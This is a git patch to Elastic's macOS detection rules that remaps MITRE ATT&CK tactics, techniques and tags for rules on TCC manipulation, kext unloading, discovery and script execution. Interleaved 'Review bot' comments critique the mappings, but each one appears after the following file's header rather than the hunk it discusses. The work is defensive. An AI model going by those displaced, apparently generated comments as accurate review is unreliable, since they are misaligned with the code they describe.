@@ -47,14 +47,7 @@ For more details on Elastic Agent configuration settings, refer to the [helper g For more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html). """ severity = "medium" -tags = [ - "Domain: Endpoint", - "OS: macOS", - "Use Case: Threat Detection", - "Tactic: Defense Evasion", - "Data Source: Elastic Defend", - "Resources: Investigation Guide", -] +tags = ["Domain: Endpoint", "OS: macOS", "Use Case: Threat Detection", "Tactic: Defense Evasion", "Tactic: Persistence", "Data Source: Elastic Defend", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "eql" @@ -102,19 +95,26 @@ Environment variables in macOS are crucial for configuring system and applicatio [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1574" name = "Hijack Execution Flow" reference = "https://attack.mitre.org/techniques/T1574/" -[[rule.threat.technique.subtechnique]] -id = "T1574.007" -name = "Path Interception by PATH Environment Variable" -reference = "https://attack.mitre.org/techniques/T1574/007/" - - [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1574" +name = "Hijack Execution Flow" +reference = "https://attack.mitre.org/techniques/T1574/" + +[rule.threat.tactic] +id = "TA0003" +name = "Persistence" +reference = "https://attack.mitre.org/tactics/TA0003/" diff --git a/rules/macos/defense_evasion_privacy_controls_tcc_database_modification.toml b/rules/macos/defense_evasion_privacy_controls_tcc_database_modification.toml index 142f83f0d06..45222ba8d1c 100644 --- a/rules/macos/defense_evasion_privacy_controls_tcc_database_modification.toml +++ b/rules/macos/defense_evasion_privacy_controls_tcc_database_modification.toml 
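Review bot: Removing `T1574.007 Path Interception by PATH Environment Variable` leaves both new `rule.threat` entries mapped to the bare T1574 technique, so the rule loses sub-technique specificity instead of gaining a better one. For environment manipulation through `launchctl` (the hunk header's description text refers to environment variables), the variables worth naming are typically `DYLD_INSERT_LIBRARIES` and other `DYLD_*` settings, which ATT&CK files under T1574.006 Dynamic Linker Hijacking; if the query outside this hunk targets those, add that sub-technique under both the Defense Evasion and Persistence entries, otherwise state in the PR why the parent technique alone is the intended mapping. The added Persistence/T1574 entry does match the new `"Tactic: Persistence"` tag in this file.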
@@ -2,7 +2,7 @@ creation_date = "2020/12/23" integration = ["endpoint"] maturity = "production" -updated_date = "2025/03/18" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -49,14 +49,7 @@ For more details on Elastic Agent configuration settings, refer to the [helper g For more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html). """ severity = "medium" -tags = [ - "Domain: Endpoint", - "OS: macOS", - "Use Case: Threat Detection", - "Tactic: Defense Evasion", - "Data Source: Elastic Defend", - "Resources: Investigation Guide", -] +tags = ["Domain: Endpoint", "OS: macOS", "Use Case: Threat Detection", "Tactic: Defense Evasion", "Tactic: Privilege Escalation", "Data Source: Elastic Defend", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "eql" 
@@ -104,19 +97,36 @@ The Transparency, Consent, and Control (TCC) database in macOS manages app permi [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1562" -name = "Impair Defenses" -reference = "https://attack.mitre.org/techniques/T1562/" -[[rule.threat.technique.subtechnique]] -id = "T1562.001" -name = "Disable or Modify Tools" -reference = "https://attack.mitre.org/techniques/T1562/001/" +[[rule.threat.technique]] +id = "T1548" +name = "Abuse Elevation Control Mechanism" +reference = "https://attack.mitre.org/techniques/T1548/" +[[rule.threat.technique.subtechnique]] +id = "T1548.006" +name = "TCC Manipulation" +reference = "https://attack.mitre.org/techniques/T1548/006/" [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1548" +name = "Abuse Elevation Control Mechanism" +reference = "https://attack.mitre.org/techniques/T1548/" + +[[rule.threat.technique.subtechnique]] +id = "T1548.006" +name = "TCC Manipulation" +reference = "https://attack.mitre.org/techniques/T1548/006/" + +[rule.threat.tactic] +id = "TA0004" +name = "Privilege Escalation" +reference = "https://attack.mitre.org/tactics/TA0004/" diff --git a/rules/macos/defense_evasion_privilege_escalation_privacy_pref_sshd_fulldiskaccess.toml b/rules/macos/defense_evasion_privilege_escalation_privacy_pref_sshd_fulldiskaccess.toml index edcdf2e9347..001273f0e01 100644 --- a/rules/macos/defense_evasion_privilege_escalation_privacy_pref_sshd_fulldiskaccess.toml +++ b/rules/macos/defense_evasion_privilege_escalation_privacy_pref_sshd_fulldiskaccess.toml @@ -2,7 +2,7 @@ creation_date = "2020/01/11" integration = ["endpoint"] maturity = "production" -updated_date = "2026/02/02" +updated_date = "2026/03/23" [rule] author = ["Elastic"] 
@@ -47,15 +47,7 @@ For more details on Elastic Agent configuration settings, refer to the [helper g For more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html). """ severity = "high" -tags = [ - "Domain: Endpoint", - "OS: macOS", - "Use Case: Threat Detection", - "Tactic: Privilege Escalation", - "Tactic: Defense Evasion", - "Data Source: Elastic Defend", - "Resources: Investigation Guide", -] +tags = ["Domain: Endpoint", "OS: macOS", "Use Case: Threat Detection", "Tactic: Collection", "Tactic: Defense Evasion", "Data Source: Elastic Defend", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "eql" @@ -105,26 +97,31 @@ Secure Copy Protocol (SCP) is used for secure file transfers over SSH. On macOS, [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1548" -name = "Abuse Elevation Control Mechanism" -reference = "https://attack.mitre.org/techniques/T1548/" +[[rule.threat.technique]] +id = "T1005" +name = "Data from Local System" +reference = "https://attack.mitre.org/techniques/T1005/" [rule.threat.tactic] -id = "TA0005" -name = "Defense Evasion" -reference = "https://attack.mitre.org/tactics/TA0005/" +id = "TA0009" +name = "Collection" +reference = "https://attack.mitre.org/tactics/TA0009/" + [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1548" name = "Abuse Elevation Control Mechanism" reference = "https://attack.mitre.org/techniques/T1548/" +[[rule.threat.technique.subtechnique]] +id = "T1548.006" +name = "TCC Manipulation" +reference = "https://attack.mitre.org/techniques/T1548/006/" [rule.threat.tactic] -id = "TA0004" -name = "Privilege Escalation" -reference = "https://attack.mitre.org/tactics/TA0004/" - +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" 
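Review bot: The `Tactic: Privilege Escalation` tag and the TA0004 threat entry are dropped here while the sibling TCC-database rule in this same patch gains a Privilege Escalation entry for the identical `T1548.006` subtechnique, so the two rules now classify the same TCC-manipulation behavior under different tactic sets. ATT&CK lists T1548 under both Defense Evasion and Privilege Escalation, and granting sshd Full Disk Access is at least as much an escalation as a TCC.db write, so either keep a third `[[rule.threat]]` with `id = "TA0004"` / `name = "Privilege Escalation"` (and the tag) alongside the new Collection entry, or record in the PR why Collection replaces it. The file is also still named `defense_evasion_privilege_escalation_privacy_pref_sshd_fulldiskaccess.toml`, which no longer matches its tactics; renaming is optional, but the drift is worth calling out.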
diff --git a/rules/macos/defense_evasion_safari_config_change.toml b/rules/macos/defense_evasion_safari_config_change.toml index 4a35cd07257..e7344238f35 100644 --- a/rules/macos/defense_evasion_safari_config_change.toml +++ b/rules/macos/defense_evasion_safari_config_change.toml @@ -2,7 +2,7 @@ creation_date = "2021/01/14" integration = ["endpoint"] maturity = "production" -updated_date = "2026/02/02" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -100,19 +100,13 @@ The 'defaults' command in macOS is a utility that allows users to read, write, a [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1562" -name = "Impair Defenses" -reference = "https://attack.mitre.org/techniques/T1562/" -[[rule.threat.technique.subtechnique]] -id = "T1562.001" -name = "Disable or Modify Tools" -reference = "https://attack.mitre.org/techniques/T1562/001/" - +[[rule.threat.technique]] +id = "T1647" +name = "Plist File Modification" +reference = "https://attack.mitre.org/techniques/T1647/" [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" - diff --git a/rules/macos/defense_evasion_sandboxed_office_app_suspicious_zip_file.toml b/rules/macos/defense_evasion_sandboxed_office_app_suspicious_zip_file.toml index 308e0584ee7..0108bed8fc5 100644 --- a/rules/macos/defense_evasion_sandboxed_office_app_suspicious_zip_file.toml +++ b/rules/macos/defense_evasion_sandboxed_office_app_suspicious_zip_file.toml @@ -2,7 +2,7 @@ creation_date = "2021/01/11" integration = ["endpoint"] maturity = "production" -updated_date = "2025/03/18" +updated_date = "2026/03/23" [rule] author = ["Elastic"] 
@@ -101,14 +101,13 @@ Microsoft Office applications on macOS operate within a sandbox to limit potenti [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1497" -name = "Virtualization/Sandbox Evasion" -reference = "https://attack.mitre.org/techniques/T1497/" +[[rule.threat.technique]] +id = "T1211" +name = "Exploitation for Defense Evasion" +reference = "https://attack.mitre.org/techniques/T1211/" [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" - diff --git a/rules/macos/defense_evasion_suspicious_tcc_access_granted.toml b/rules/macos/defense_evasion_suspicious_tcc_access_granted.toml index 03d0581f379..8e521ac1de8 100644 --- a/rules/macos/defense_evasion_suspicious_tcc_access_granted.toml +++ b/rules/macos/defense_evasion_suspicious_tcc_access_granted.toml @@ -2,7 +2,7 @@ creation_date = "2026/01/30" integration = ["endpoint"] maturity = "production" -updated_date = "2026/02/03" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -18,15 +18,7 @@ name = "Suspicious TCC Access Granted for User Folders" risk_score = 73 rule_id = "ffd8b5e9-aa63-42b3-aead-6fdb170da9a3" severity = "high" -tags = [ - "Domain: Endpoint", - "OS: macOS", - "Use Case: Threat Detection", - "Tactic: Defense Evasion", - "Tactic: Collection", - "Data Source: Elastic Defend", - "Resources: Investigation Guide" -] +tags = ["Domain: Endpoint", "OS: macOS", "Use Case: Threat Detection", "Tactic: Collection", "Tactic: Defense Evasion", "Tactic: Privilege Escalation", "Data Source: Elastic Defend", "Resources: Investigation Guide"] type = "esql" note = """## Triage and analysis 
@@ -85,30 +77,48 @@ FROM logs-endpoint.events.* [[rule.threat]] framework = "MITRE ATT&CK" - [rule.threat.tactic] - name = "Defense Evasion" - id = "TA0005" - reference = "https://attack.mitre.org/tactics/TA0005/" +[[rule.threat.technique]] +id = "T1005" +name = "Data from Local System" +reference = "https://attack.mitre.org/techniques/T1005/" - [[rule.threat.technique]] - name = "Abuse Elevation Control Mechanism" - id = "T1548" - reference = "https://attack.mitre.org/techniques/T1548/" +[rule.threat.tactic] +id = "TA0009" +name = "Collection" +reference = "https://attack.mitre.org/tactics/TA0009/" - [[rule.threat.technique.subtechnique]] - name = "TCC Manipulation" - id = "T1548.006" - reference = "https://attack.mitre.org/techniques/T1548/006/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1548" +name = "Abuse Elevation Control Mechanism" +reference = "https://attack.mitre.org/techniques/T1548/" + +[[rule.threat.technique.subtechnique]] +id = "T1548.006" +name = "TCC Manipulation" +reference = "https://attack.mitre.org/techniques/T1548/006/" + +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" [[rule.threat]] framework = "MITRE ATT&CK" - [rule.threat.tactic] - name = "Collection" - id = "TA0009" - reference = "https://attack.mitre.org/tactics/TA0009/" +[[rule.threat.technique]] +id = "T1548" +name = "Abuse Elevation Control Mechanism" +reference = "https://attack.mitre.org/techniques/T1548/" + +[[rule.threat.technique.subtechnique]] +id = "T1548.006" +name = "TCC Manipulation" +reference = "https://attack.mitre.org/techniques/T1548/006/" - [[rule.threat.technique]] - name = "Data from Local System" - id = "T1005" - reference = "https://attack.mitre.org/techniques/T1005/" +[rule.threat.tactic] +id = "TA0004" +name = "Privilege Escalation" +reference = "https://attack.mitre.org/tactics/TA0004/" 
diff --git a/rules/macos/defense_evasion_unload_endpointsecurity_kext.toml b/rules/macos/defense_evasion_unload_endpointsecurity_kext.toml index 11135c5720e..4a94c88a37e 100644 --- a/rules/macos/defense_evasion_unload_endpointsecurity_kext.toml +++ b/rules/macos/defense_evasion_unload_endpointsecurity_kext.toml @@ -2,7 +2,7 @@ creation_date = "2020/01/05" integration = ["endpoint"] maturity = "production" -updated_date = "2026/02/02" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -93,36 +93,18 @@ Elastic Endpoint Security's kernel extension is crucial for monitoring and prote [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1562" name = "Impair Defenses" reference = "https://attack.mitre.org/techniques/T1562/" + [[rule.threat.technique.subtechnique]] id = "T1562.001" name = "Disable or Modify Tools" reference = "https://attack.mitre.org/techniques/T1562/001/" - - [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" -[[rule.threat]] -framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1547" -name = "Boot or Logon Autostart Execution" -reference = "https://attack.mitre.org/techniques/T1547/" -[[rule.threat.technique.subtechnique]] -id = "T1547.006" -name = "Kernel Modules and Extensions" -reference = "https://attack.mitre.org/techniques/T1547/006/" - - - -[rule.threat.tactic] -id = "TA0003" -name = "Persistence" -reference = "https://attack.mitre.org/tactics/TA0003/" - diff --git a/rules/macos/discovery_full_disk_access_check.toml b/rules/macos/discovery_full_disk_access_check.toml index 58b259b52dd..02e5c37b70d 100644 --- a/rules/macos/discovery_full_disk_access_check.toml +++ b/rules/macos/discovery_full_disk_access_check.toml @@ -2,7 +2,7 @@ creation_date = "2026/01/30" integration = ["endpoint"] maturity = "production" -updated_date = "2026/02/09" +updated_date = "2026/03/23" [rule] author = ["Elastic"] 
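Review bot: A leftover `"Tactic: Persistence"` tag would now be orphaned: the Persistence `[[rule.threat]]` entry (T1547.006) is deleted in this hunk, but no hunk in this patch touches this rule's `tags` list, so nothing visible confirms the tag set was already limited to `"Tactic: Defense Evasion"`. Please verify the tags, or remove `"Tactic: Persistence"` from `tags` in the same change so the tag list and `rule.threat` stay in agreement. The removal itself is sound, since unloading a security kext is evasion rather than an autostart mechanism.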
@@ -72,30 +72,12 @@ file where host.os.type == "macos" and event.action == "open" and [[rule.threat]] framework = "MITRE ATT&CK" - [rule.threat.tactic] - name = "Discovery" - id = "TA0007" - reference = "https://attack.mitre.org/tactics/TA0007/" +[[rule.threat.technique]] +id = "T1083" +name = "File and Directory Discovery" +reference = "https://attack.mitre.org/techniques/T1083/" - [[rule.threat.technique]] - name = "File and Directory Discovery" - id = "T1083" - reference = "https://attack.mitre.org/techniques/T1083/" - -[[rule.threat]] -framework = "MITRE ATT&CK" - - [rule.threat.tactic] - name = "Defense Evasion" - id = "TA0005" - reference = "https://attack.mitre.org/tactics/TA0005/" - - [[rule.threat.technique]] - name = "Abuse Elevation Control Mechanism" - id = "T1548" - reference = "https://attack.mitre.org/techniques/T1548/" - - [[rule.threat.technique.subtechnique]] - name = "TCC Manipulation" - id = "T1548.006" - reference = "https://attack.mitre.org/techniques/T1548/006/" +[rule.threat.tactic] +id = "TA0007" +name = "Discovery" +reference = "https://attack.mitre.org/tactics/TA0007/" diff --git a/rules/macos/discovery_suspicious_sip_check.toml b/rules/macos/discovery_suspicious_sip_check.toml index cf48e7fe8b7..e2fd4a9eab1 100644 --- a/rules/macos/discovery_suspicious_sip_check.toml +++ b/rules/macos/discovery_suspicious_sip_check.toml @@ -2,7 +2,7 @@ creation_date = "2026/01/30" integration = ["endpoint"] maturity = "production" -updated_date = "2026/02/09" +updated_date = "2026/03/23" [rule] author = ["Elastic"] 
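Review bot: With the Defense Evasion entry (T1548.006) removed and this rule's `tags` line absent from the patch, a surviving `"Tactic: Defense Evasion"` tag would have no backing tactic; please confirm `tags` now carries only `"Tactic: Discovery"`. Keeping the rule at Discovery/T1083 is reasonable for a query that triggers on `event.action == "open"` rather than a modification, but a one-line rationale in the rule `note` would stop a later cleanup from re-adding the evasion mapping. The `file where ...` query itself begins outside this hunk.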
@@ -74,22 +74,30 @@ process where host.os.type == "macos" and event.type == "start" and event.action [[rule.threat]] framework = "MITRE ATT&CK" - [rule.threat.tactic] - name = "Discovery" - id = "TA0007" - reference = "https://attack.mitre.org/tactics/TA0007/" - - [[rule.threat.technique]] - name = "System Information Discovery" - id = "T1082" - reference = "https://attack.mitre.org/techniques/T1082/" - - [[rule.threat.technique]] - name = "Virtualization/Sandbox Evasion" - id = "T1497" - reference = "https://attack.mitre.org/techniques/T1497/" - - [[rule.threat.technique.subtechnique]] - name = "System Checks" - id = "T1497.001" - reference = "https://attack.mitre.org/techniques/T1497/001/" +[[rule.threat.technique]] +id = "T1497" +name = "Virtualization/Sandbox Evasion" +reference = "https://attack.mitre.org/techniques/T1497/" + +[[rule.threat.technique.subtechnique]] +id = "T1497.001" +name = "System Checks" +reference = "https://attack.mitre.org/techniques/T1497/001/" + +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1082" +name = "System Information Discovery" +reference = "https://attack.mitre.org/techniques/T1082/" + +[rule.threat.tactic] +id = "TA0007" +name = "Discovery" +reference = "https://attack.mitre.org/tactics/TA0007/" diff --git a/rules/macos/discovery_system_and_network_configuration_check.toml b/rules/macos/discovery_system_and_network_configuration_check.toml index 05dfd0e7ded..c19554c1387 100644 --- a/rules/macos/discovery_system_and_network_configuration_check.toml +++ b/rules/macos/discovery_system_and_network_configuration_check.toml @@ -2,7 +2,7 @@ creation_date = "2026/01/30" integration = ["endpoint"] maturity = "production" -updated_date = "2026/02/09" +updated_date = "2026/03/23" [rule] author = ["Elastic"] 
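Review bot: The new Defense Evasion `[[rule.threat]]` entry (TA0005 with T1497.001) has no matching tag unless this file's `tags` already contained `"Tactic: Defense Evasion"`, and no hunk in this patch edits that list for this rule. Add `"Tactic: Defense Evasion"` to `tags` next to `"Tactic: Discovery"` in the same change. The previous single entry kept T1497 under Discovery, which ATT&CK permits because T1497 is dual-tactic, so splitting it is fine as long as the tags follow.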
@@ -71,17 +71,12 @@ file where host.os.type == "macos" and event.action == "open" and [[rule.threat]] framework = "MITRE ATT&CK" - [rule.threat.tactic] - name = "Discovery" - id = "TA0007" - reference = "https://attack.mitre.org/tactics/TA0007/" +[[rule.threat.technique]] +id = "T1016" +name = "System Network Configuration Discovery" +reference = "https://attack.mitre.org/techniques/T1016/" - [[rule.threat.technique]] - name = "System Information Discovery" - id = "T1082" - reference = "https://attack.mitre.org/techniques/T1082/" - - [[rule.threat.technique]] - name = "System Network Configuration Discovery" - id = "T1016" - reference = "https://attack.mitre.org/techniques/T1016/" +[rule.threat.tactic] +id = "TA0007" +name = "Discovery" +reference = "https://attack.mitre.org/tactics/TA0007/" diff --git a/rules/macos/discovery_users_domain_built_in_commands.toml b/rules/macos/discovery_users_domain_built_in_commands.toml index 6720bc025b4..94be2280f1e 100644 --- a/rules/macos/discovery_users_domain_built_in_commands.toml +++ b/rules/macos/discovery_users_domain_built_in_commands.toml @@ -2,7 +2,7 @@ creation_date = "2021/01/12" integration = ["endpoint"] maturity = "production" -updated_date = "2025/03/18" +updated_date = "2026/03/23" [rule] author = ["Elastic"] 
@@ -105,29 +105,38 @@ Built-in macOS commands like `ldapsearch`, `dsmemberutil`, and `dscl` are essent [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1069" name = "Permission Groups Discovery" reference = "https://attack.mitre.org/techniques/T1069/" + [[rule.threat.technique.subtechnique]] id = "T1069.001" name = "Local Groups" reference = "https://attack.mitre.org/techniques/T1069/001/" +[[rule.threat.technique.subtechnique]] +id = "T1069.002" +name = "Domain Groups" +reference = "https://attack.mitre.org/techniques/T1069/002/" [[rule.threat.technique]] id = "T1087" name = "Account Discovery" reference = "https://attack.mitre.org/techniques/T1087/" + [[rule.threat.technique.subtechnique]] id = "T1087.001" name = "Local Account" reference = "https://attack.mitre.org/techniques/T1087/001/" - +[[rule.threat.technique.subtechnique]] +id = "T1087.002" +name = "Domain Account" +reference = "https://attack.mitre.org/techniques/T1087/002/" [rule.threat.tactic] id = "TA0007" name = "Discovery" reference = "https://attack.mitre.org/tactics/TA0007/" - diff --git a/rules/macos/execution_defense_evasion_electron_app_childproc_node_js.toml b/rules/macos/execution_defense_evasion_electron_app_childproc_node_js.toml index 6ec5857b809..f61613a511a 100644 --- a/rules/macos/execution_defense_evasion_electron_app_childproc_node_js.toml +++ b/rules/macos/execution_defense_evasion_electron_app_childproc_node_js.toml @@ -2,7 +2,7 @@ creation_date = "2020/01/07" integration = ["endpoint"] maturity = "production" -updated_date = "2025/03/18" +updated_date = "2026/03/23" [rule] author = ["Elastic"] 
@@ -48,15 +48,7 @@ For more details on Elastic Agent configuration settings, refer to the [helper g For more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html). """ severity = "medium" -tags = [ - "Domain: Endpoint", - "OS: macOS", - "Use Case: Threat Detection", - "Tactic: Defense Evasion", - "Tactic: Execution", - "Data Source: Elastic Defend", - "Resources: Investigation Guide", -] +tags = ["Domain: Endpoint", "OS: macOS", "Use Case: Threat Detection", "Tactic: Execution", "Data Source: Elastic Defend", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "eql" @@ -103,26 +95,18 @@ Electron applications, built on Node.js, can execute child processes using the ` [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1059" name = "Command and Scripting Interpreter" reference = "https://attack.mitre.org/techniques/T1059/" +[[rule.threat.technique.subtechnique]] +id = "T1059.007" +name = "JavaScript" +reference = "https://attack.mitre.org/techniques/T1059/007/" [rule.threat.tactic] id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" -[[rule.threat]] -framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1548" -name = "Abuse Elevation Control Mechanism" -reference = "https://attack.mitre.org/techniques/T1548/" - - -[rule.threat.tactic] -id = "TA0005" -name = "Defense Evasion" -reference = "https://attack.mitre.org/tactics/TA0005/" - diff --git a/rules/macos/execution_initial_access_suspicious_browser_childproc.toml b/rules/macos/execution_initial_access_suspicious_browser_childproc.toml index 3280689d092..39cc78ca42e 100644 --- a/rules/macos/execution_initial_access_suspicious_browser_childproc.toml +++ b/rules/macos/execution_initial_access_suspicious_browser_childproc.toml 
@@ -2,7 +2,7 @@ creation_date = "2020/12/23" integration = ["endpoint"] maturity = "production" -updated_date = "2025/03/18" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -106,26 +106,31 @@ Web browsers are integral to user interaction with the internet, often serving a [[rule.threat]] framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1059" +name = "Command and Scripting Interpreter" +reference = "https://attack.mitre.org/techniques/T1059/" + [[rule.threat.technique]] id = "T1203" name = "Exploitation for Client Execution" reference = "https://attack.mitre.org/techniques/T1203/" - [rule.threat.tactic] id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" + [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1189" name = "Drive-by Compromise" reference = "https://attack.mitre.org/techniques/T1189/" - [rule.threat.tactic] id = "TA0001" name = "Initial Access" reference = "https://attack.mitre.org/tactics/TA0001/" - diff --git a/rules/macos/execution_installer_package_spawned_network_event.toml b/rules/macos/execution_installer_package_spawned_network_event.toml index f54b8347f48..d69784d76b8 100644 --- a/rules/macos/execution_installer_package_spawned_network_event.toml +++ b/rules/macos/execution_installer_package_spawned_network_event.toml @@ -2,7 +2,7 @@ creation_date = "2021/02/23" integration = ["endpoint"] maturity = "production" -updated_date = "2025/04/21" +updated_date = "2026/03/23" [rule] author = ["Elastic"] 
@@ -112,36 +112,36 @@ MacOS installer packages, often with a .pkg extension, are used to distribute so [[rule.threat]] framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1105" +name = "Ingress Tool Transfer" +reference = "https://attack.mitre.org/techniques/T1105/" + +[rule.threat.tactic] +id = "TA0011" +name = "Command and Control" +reference = "https://attack.mitre.org/tactics/TA0011/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1059" name = "Command and Scripting Interpreter" reference = "https://attack.mitre.org/techniques/T1059/" -[[rule.threat.technique.subtechnique]] -id = "T1059.007" -name = "JavaScript" -reference = "https://attack.mitre.org/techniques/T1059/007/" +[[rule.threat.technique]] +id = "T1204" +name = "User Execution" +reference = "https://attack.mitre.org/techniques/T1204/" +[[rule.threat.technique.subtechnique]] +id = "T1204.002" +name = "Malicious File" +reference = "https://attack.mitre.org/techniques/T1204/002/" [rule.threat.tactic] id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" -[[rule.threat]] -framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1071" -name = "Application Layer Protocol" -reference = "https://attack.mitre.org/techniques/T1071/" -[[rule.threat.technique.subtechnique]] -id = "T1071.001" -name = "Web Protocols" -reference = "https://attack.mitre.org/techniques/T1071/001/" - - - -[rule.threat.tactic] -id = "TA0011" -name = "Command and Control" -reference = "https://attack.mitre.org/tactics/TA0011/" - diff --git a/rules/macos/execution_python_shell_spawn_first_occurrence.toml b/rules/macos/execution_python_shell_spawn_first_occurrence.toml index 6da50e09b03..19c07e9db90 100644 --- a/rules/macos/execution_python_shell_spawn_first_occurrence.toml +++ b/rules/macos/execution_python_shell_spawn_first_occurrence.toml 
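Review bot: `T1059` is left without a subtechnique in the Execution entry even though the previous `T1059.007` was removed, yet a .pkg that spawns a network event most plausibly does so from a preinstall/postinstall shell script, which would make `T1059.004` (Unix Shell) the precise mapping; the query is outside this hunk, so treat this as a question rather than a defect. The C2 change from `T1071.001` to `T1105` (Ingress Tool Transfer) narrows the meaning from "any web traffic" to "a download" and deserves a sentence in the rule description. Moving Command and Control ahead of Execution matches the alphabetical-by-tactic ordering used across the rest of the patch.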
@@ -2,7 +2,7 @@ creation_date = "2026/02/23" integration = ["endpoint"] maturity = "production" -updated_date = "2026/02/23" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -76,10 +76,17 @@ not process.command_line:(*pip* or *conda* or *brew* or *jupyter*) [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1059" name = "Command and Scripting Interpreter" reference = "https://attack.mitre.org/techniques/T1059/" + +[[rule.threat.technique.subtechnique]] +id = "T1059.004" +name = "Unix Shell" +reference = "https://attack.mitre.org/techniques/T1059/004/" + [[rule.threat.technique.subtechnique]] id = "T1059.006" name = "Python" @@ -89,7 +96,6 @@ reference = "https://attack.mitre.org/techniques/T1059/006/" id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" - [rule.new_terms] field = "new_terms_fields" value = ["host.id", "process.parent.executable"] diff --git a/rules/macos/execution_script_via_automator_workflows.toml b/rules/macos/execution_script_via_automator_workflows.toml index a5320a95420..0fc33f5e576 100644 --- a/rules/macos/execution_script_via_automator_workflows.toml +++ b/rules/macos/execution_script_via_automator_workflows.toml @@ -2,7 +2,7 @@ creation_date = "2020/12/23" integration = ["endpoint"] maturity = "production" -updated_date = "2025/03/18" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -97,14 +97,18 @@ Automator, a macOS utility, allows users to automate repetitive tasks through wo [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1059" name = "Command and Scripting Interpreter" reference = "https://attack.mitre.org/techniques/T1059/" +[[rule.threat.technique.subtechnique]] +id = "T1059.007" +name = "JavaScript" +reference = "https://attack.mitre.org/techniques/T1059/007/" [rule.threat.tactic] id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" - 
diff --git a/rules/macos/execution_scripting_osascript_exec_followed_by_netcon.toml b/rules/macos/execution_scripting_osascript_exec_followed_by_netcon.toml index f657656b65c..24770fce50b 100644 --- a/rules/macos/execution_scripting_osascript_exec_followed_by_netcon.toml +++ b/rules/macos/execution_scripting_osascript_exec_followed_by_netcon.toml @@ -2,7 +2,7 @@ creation_date = "2020/12/07" integration = ["endpoint"] maturity = "production" -updated_date = "2025/03/18" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -108,31 +108,31 @@ AppleScript, a scripting language for macOS, automates tasks by controlling appl [[rule.threat]] framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1071" +name = "Application Layer Protocol" +reference = "https://attack.mitre.org/techniques/T1071/" + +[rule.threat.tactic] +id = "TA0011" +name = "Command and Control" +reference = "https://attack.mitre.org/tactics/TA0011/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1059" name = "Command and Scripting Interpreter" reference = "https://attack.mitre.org/techniques/T1059/" + [[rule.threat.technique.subtechnique]] id = "T1059.002" name = "AppleScript" reference = "https://attack.mitre.org/techniques/T1059/002/" - - [rule.threat.tactic] id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" -[[rule.threat]] -framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1105" -name = "Ingress Tool Transfer" -reference = "https://attack.mitre.org/techniques/T1105/" - - -[rule.threat.tactic] -id = "TA0011" -name = "Command and Control" -reference = "https://attack.mitre.org/tactics/TA0011/" - diff --git 